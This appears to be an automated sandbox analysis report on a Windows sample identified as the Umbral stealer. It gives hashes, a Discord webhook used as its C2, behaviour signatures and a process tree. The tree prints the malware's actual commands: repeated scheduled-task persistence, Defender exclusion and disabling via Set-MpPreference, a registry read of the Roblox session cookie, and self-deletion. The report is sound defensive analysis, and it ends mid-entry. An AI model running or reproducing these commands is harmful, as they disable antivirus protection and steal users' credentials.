Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    05-06-2024 01:53

General

  • Target

    Client.exe

  • Size

    380KB

  • MD5

    7091d715676e10c44205e6fa7f50b7bd

  • SHA1

    a950398047b6b554181538d6e78ada18bfba510e

  • SHA256

    23f43cc11c07245b3c5c14333a53b97330ebd7afa4a893245834fbebfa967d88

  • SHA512

    2fd66a8fd5b4d0f1ef52f6cd89b8e14936b56fdb967a83382d8081e67fbbabdb609decef98d19c8caebcc1b5b9bcc3cbaa0209112c9c081556ff87bfcdf7308b

  • SSDEEP

    6144:MwZC8z6GIwaC9M1G4TIcgGz+rH4uCBbhZnKMgVia:RZC8OGgt1G4TGY+NCNn4Vi

Malware Config

Extracted

Family

umbral

C2

https://discord.com/api/webhooks/1247729405409759390/zWUzhv3beId_l06S4nnTrfCRsAkIoHRjlpnuQcnbUkUm0eJjGGkP-VfghAOgfXCbrdiS

Signatures

  • Contains code to disable Windows Defender 1 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • Detect Umbral payload 2 IoCs
  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
  • UAC bypass 3 TTPs 3 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Start PowerShell.

  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in Program Files directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 46 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 18 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 3 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Client.exe
    "C:\Users\Admin\AppData\Local\Temp\Client.exe"
    1⤵
    • Modifies WinLogon for persistence
    • UAC bypass
    • Checks whether UAC is enabled
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    • System policy modification
    PID:2848
    • C:\Windows\system32\CMD.exe
      "CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Microsoft Visio" /tr "C:\Program Files\$77fuh.exe" & exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2568
      • C:\Windows\system32\schtasks.exe
        SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Microsoft Visio" /tr "C:\Program Files\$77fuh.exe"
        3⤵
        • Creates scheduled task(s)
        PID:2556
    • C:\Windows\system32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2504
      • C:\Windows\system32\schtasks.exe
        SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST
        3⤵
        • Creates scheduled task(s)
        PID:2564
    • C:\Windows\system32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1576
      • C:\Windows\system32\schtasks.exe
        SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST
        3⤵
        • Creates scheduled task(s)
        PID:2688
    • C:\Windows\system32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1548
      • C:\Windows\system32\schtasks.exe
        SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST
        3⤵
        • Creates scheduled task(s)
        PID:1720
    • C:\Windows\system32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:820
      • C:\Windows\system32\schtasks.exe
        SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST
        3⤵
        • Creates scheduled task(s)
        PID:1924
    • C:\Windows\system32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2300
      • C:\Windows\system32\schtasks.exe
        SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST
        3⤵
        • Creates scheduled task(s)
        PID:768
    • C:\Windows\system32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2280
      • C:\Windows\system32\schtasks.exe
        SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST
        3⤵
        • Creates scheduled task(s)
        PID:1580
    • C:\Windows\system32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1368
      • C:\Windows\system32\schtasks.exe
        SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST
        3⤵
        • Creates scheduled task(s)
        PID:1148
    • C:\Windows\system32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1532
      • C:\Windows\system32\schtasks.exe
        SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST
        3⤵
        • Creates scheduled task(s)
        PID:1284
    • C:\Windows\system32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2104
      • C:\Windows\system32\schtasks.exe
        SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST
        3⤵
        • Creates scheduled task(s)
        PID:1224
    • C:\Windows\system32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2072
      • C:\Windows\system32\schtasks.exe
        SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST
        3⤵
        • Creates scheduled task(s)
        PID:1996
    • C:\Windows\system32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit
      2⤵
        PID:324
        • C:\Windows\system32\schtasks.exe
          SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST
          3⤵
          • Creates scheduled task(s)
          PID:556
      • C:\Windows\system32\CMD.exe
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit
        2⤵
          PID:924
          • C:\Windows\system32\schtasks.exe
            SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST
            3⤵
            • Creates scheduled task(s)
            PID:1416
        • C:\Windows\system32\CMD.exe
          "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit
          2⤵
            PID:1584
            • C:\Windows\system32\schtasks.exe
              SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST
              3⤵
              • Creates scheduled task(s)
              PID:1796
          • C:\Windows\system32\CMD.exe
            "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit
            2⤵
              PID:1800
              • C:\Windows\system32\schtasks.exe
                SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST
                3⤵
                • Creates scheduled task(s)
                PID:1728
            • C:\Windows\system32\CMD.exe
              "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit
              2⤵
                PID:2116
                • C:\Windows\system32\schtasks.exe
                  SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST
                  3⤵
                  • Creates scheduled task(s)
                  PID:2044
              • C:\Windows\system32\CMD.exe
                "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit
                2⤵
                  PID:1124
                  • C:\Windows\system32\schtasks.exe
                    SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST
                    3⤵
                    • Creates scheduled task(s)
                    PID:2924
                • C:\Windows\system32\CMD.exe
                  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit
                  2⤵
                    PID:2888
                    • C:\Windows\system32\schtasks.exe
                      SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST
                      3⤵
                      • Creates scheduled task(s)
                      PID:496
                  • C:\Windows\system32\CMD.exe
                    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit
                    2⤵
                      PID:1004
                      • C:\Windows\system32\schtasks.exe
                        SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST
                        3⤵
                        • Creates scheduled task(s)
                        PID:1236
                    • C:\Windows\system32\CMD.exe
                      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit
                      2⤵
                        PID:1608
                        • C:\Windows\system32\schtasks.exe
                          SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST
                          3⤵
                          • Creates scheduled task(s)
                          PID:1448
                      • C:\Windows\system32\CMD.exe
                        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit
                        2⤵
                          PID:1312
                          • C:\Windows\system32\schtasks.exe
                            SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST
                            3⤵
                            • Creates scheduled task(s)
                            PID:356
                        • C:\Windows\system32\CMD.exe
                          "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit
                          2⤵
                            PID:404
                            • C:\Windows\system32\schtasks.exe
                              SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST
                              3⤵
                              • Creates scheduled task(s)
                              PID:960
                          • C:\Windows\system32\CMD.exe
                            "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit
                            2⤵
                              PID:1012
                              • C:\Windows\system32\schtasks.exe
                                SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST
                                3⤵
                                • Creates scheduled task(s)
                                PID:2956
                            • C:\Windows\system32\CMD.exe
                              "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit
                              2⤵
                                PID:888
                                • C:\Windows\system32\schtasks.exe
                                  SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST
                                  3⤵
                                  • Creates scheduled task(s)
                                  PID:704
                              • C:\Windows\system32\CMD.exe
                                "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit
                                2⤵
                                  PID:1708
                                  • C:\Windows\system32\schtasks.exe
                                    SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST
                                    3⤵
                                    • Creates scheduled task(s)
                                    PID:2776
                                • C:\Windows\system32\CMD.exe
                                  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit
                                  2⤵
                                    PID:1552
                                    • C:\Windows\system32\schtasks.exe
                                      SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST
                                      3⤵
                                      • Creates scheduled task(s)
                                      PID:3008
                                  • C:\Windows\system32\CMD.exe
                                    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit
                                    2⤵
                                      PID:2220
                                      • C:\Windows\system32\schtasks.exe
                                        SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST
                                        3⤵
                                        • Creates scheduled task(s)
                                        PID:2980
                                    • C:\Windows\system32\CMD.exe
                                      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit
                                      2⤵
                                        PID:1676
                                        • C:\Windows\system32\schtasks.exe
                                          SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST
                                          3⤵
                                          • Creates scheduled task(s)
                                          PID:892
                                      • C:\Windows\system32\CMD.exe
                                        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit
                                        2⤵
                                          PID:2844
                                          • C:\Windows\system32\schtasks.exe
                                            SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST
                                            3⤵
                                            • Creates scheduled task(s)
                                            PID:2728
                                        • C:\Windows\system32\CMD.exe
                                          "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit
                                          2⤵
                                            PID:1516
                                            • C:\Windows\system32\schtasks.exe
                                              SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST
                                              3⤵
                                              • Creates scheduled task(s)
                                              PID:2800
                                          • C:\Windows\system32\CMD.exe
                                            "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit
                                            2⤵
                                              PID:2964
                                              • C:\Windows\system32\schtasks.exe
                                                SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST
                                                3⤵
                                                • Creates scheduled task(s)
                                                PID:2588
                                            • C:\Windows\system32\CMD.exe
                                              "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit
                                              2⤵
                                                PID:2908
                                                • C:\Windows\system32\schtasks.exe
                                                  SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST
                                                  3⤵
                                                  • Creates scheduled task(s)
                                                  PID:2348
                                              • C:\Windows\system32\CMD.exe
                                                "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit
                                                2⤵
                                                  PID:2304
                                                  • C:\Windows\system32\schtasks.exe
                                                    SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST
                                                    3⤵
                                                    • Creates scheduled task(s)
                                                    PID:2508
                                                • C:\Windows\system32\CMD.exe
                                                  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit
                                                  2⤵
                                                    PID:2768
                                                    • C:\Windows\system32\schtasks.exe
                                                      SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST
                                                      3⤵
                                                      • Creates scheduled task(s)
                                                      PID:2580
                                                  • C:\Windows\System32\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\l1gdcwtr.ezy.exe"' & exit
                                                    2⤵
                                                      PID:2556
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\l1gdcwtr.ezy.exe"'
                                                        3⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:2444
                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\l1gdcwtr.ezy.exe
                                                          "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\l1gdcwtr.ezy.exe"
                                                          4⤵
                                                          • Drops file in Drivers directory
                                                          • Executes dropped EXE
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:2684
                                                          • C:\Windows\system32\attrib.exe
                                                            "attrib.exe" +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\l1gdcwtr.ezy.exe"
                                                            5⤵
                                                            • Views/modifies file attributes
                                                            PID:2352
                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\l1gdcwtr.ezy.exe'
                                                            5⤵
                                                            • Command and Scripting Interpreter: PowerShell
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:1736
                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                                                            5⤵
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:2204
                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                            5⤵
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:1996
                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                            5⤵
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:792
                                                          • C:\Windows\System32\Wbem\wmic.exe
                                                            "wmic.exe" os get Caption
                                                            5⤵
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:2080
                                                          • C:\Windows\System32\Wbem\wmic.exe
                                                            "wmic.exe" computersystem get totalphysicalmemory
                                                            5⤵
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:1988
                                                          • C:\Windows\System32\Wbem\wmic.exe
                                                            "wmic.exe" csproduct get uuid
                                                            5⤵
                                                              PID:2932
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                              5⤵
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              PID:2272
                                                            • C:\Windows\System32\Wbem\wmic.exe
                                                              "wmic" path win32_VideoController get name
                                                              5⤵
                                                              • Detects videocard installed
                                                              PID:1956
                                                            • C:\Windows\system32\cmd.exe
                                                              "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\l1gdcwtr.ezy.exe" && pause
                                                              5⤵
                                                                PID:1556
                                                                • C:\Windows\system32\PING.EXE
                                                                  ping localhost
                                                                  6⤵
                                                                  • Runs ping.exe
                                                                  PID:960
                                                        • C:\Windows\system32\CMD.exe
                                                          "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit
                                                          2⤵
                                                            PID:548
                                                            • C:\Windows\system32\schtasks.exe
                                                              SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST
                                                              3⤵
                                                              • Creates scheduled task(s)
                                                              PID:1924
                                                          • C:\Windows\system32\CMD.exe
                                                            "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit
                                                            2⤵
                                                              PID:1568
                                                              • C:\Windows\system32\schtasks.exe
                                                                SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST
                                                                3⤵
                                                                • Creates scheduled task(s)
                                                                PID:1148
                                                            • C:\Windows\system32\CMD.exe
                                                              "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit
                                                              2⤵
                                                                PID:964
                                                                • C:\Windows\system32\schtasks.exe
                                                                  SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST
                                                                  3⤵
                                                                  • Creates scheduled task(s)
                                                                  PID:944
                                                              • C:\Windows\system32\CMD.exe
                                                                "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit
                                                                2⤵
                                                                  PID:2008
                                                                  • C:\Windows\system32\schtasks.exe
                                                                    SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST
                                                                    3⤵
                                                                    • Creates scheduled task(s)
                                                                    PID:968
                                                                • C:\Windows\system32\CMD.exe
                                                                  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit
                                                                  2⤵
                                                                    PID:1680
                                                                    • C:\Windows\system32\schtasks.exe
                                                                      SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST
                                                                      3⤵
                                                                      • Creates scheduled task(s)
                                                                      PID:2804
                                                                  • C:\Windows\system32\CMD.exe
                                                                    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit
                                                                    2⤵
                                                                      PID:2720
                                                                      • C:\Windows\system32\schtasks.exe
                                                                        SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST
                                                                        3⤵
                                                                        • Creates scheduled task(s)
                                                                        PID:1476
                                                                    • C:\Windows\system32\CMD.exe
                                                                      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit
                                                                      2⤵
                                                                        PID:1452
                                                                        • C:\Windows\system32\schtasks.exe
                                                                          SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST
                                                                          3⤵
                                                                          • Creates scheduled task(s)
                                                                          PID:652
                                                                      • C:\Windows\system32\CMD.exe
                                                                        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit
                                                                        2⤵
                                                                          PID:2232
                                                                          • C:\Windows\system32\schtasks.exe
                                                                            SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST
                                                                            3⤵
                                                                            • Creates scheduled task(s)
                                                                            PID:900
                                                                        • C:\Windows\system32\CMD.exe
                                                                          "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit
                                                                          2⤵
                                                                            PID:1444
                                                                            • C:\Windows\system32\schtasks.exe
                                                                              SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST
                                                                              3⤵
                                                                              • Creates scheduled task(s)
                                                                              PID:1952
                                                                          • C:\Windows\system32\CMD.exe
                                                                            "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit
                                                                            2⤵
                                                                              PID:2796
                                                                              • C:\Windows\system32\schtasks.exe
                                                                                SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST
                                                                                3⤵
                                                                                • Creates scheduled task(s)
                                                                                PID:2476
                                                                            • C:\Windows\system32\CMD.exe
                                                                              "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit
                                                                              2⤵
                                                                                PID:1536
                                                                                • C:\Windows\system32\schtasks.exe
                                                                                  SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST
                                                                                  3⤵
                                                                                  • Creates scheduled task(s)
                                                                                  PID:1640
                                                                              • C:\Windows\system32\CMD.exe
                                                                                "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit
                                                                                2⤵
                                                                                  PID:2608
                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                    SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST
                                                                                    3⤵
                                                                                    • Creates scheduled task(s)
                                                                                    PID:2604
                                                                              • C:\Windows\system32\wbem\WmiApSrv.exe
                                                                                C:\Windows\system32\wbem\WmiApSrv.exe
                                                                                1⤵
                                                                                  PID:2860

                                                                                Network

                                                                                MITRE ATT&CK Enterprise v15

                                                                                Replay Monitor

                                                                                Loading Replay Monitor...

                                                                                Downloads

                                                                                • C:\Program Files\$77fuh.exe

                                                                                  Filesize

                                                                                  380KB

                                                                                  MD5

                                                                                  7091d715676e10c44205e6fa7f50b7bd

                                                                                  SHA1

                                                                                  a950398047b6b554181538d6e78ada18bfba510e

                                                                                  SHA256

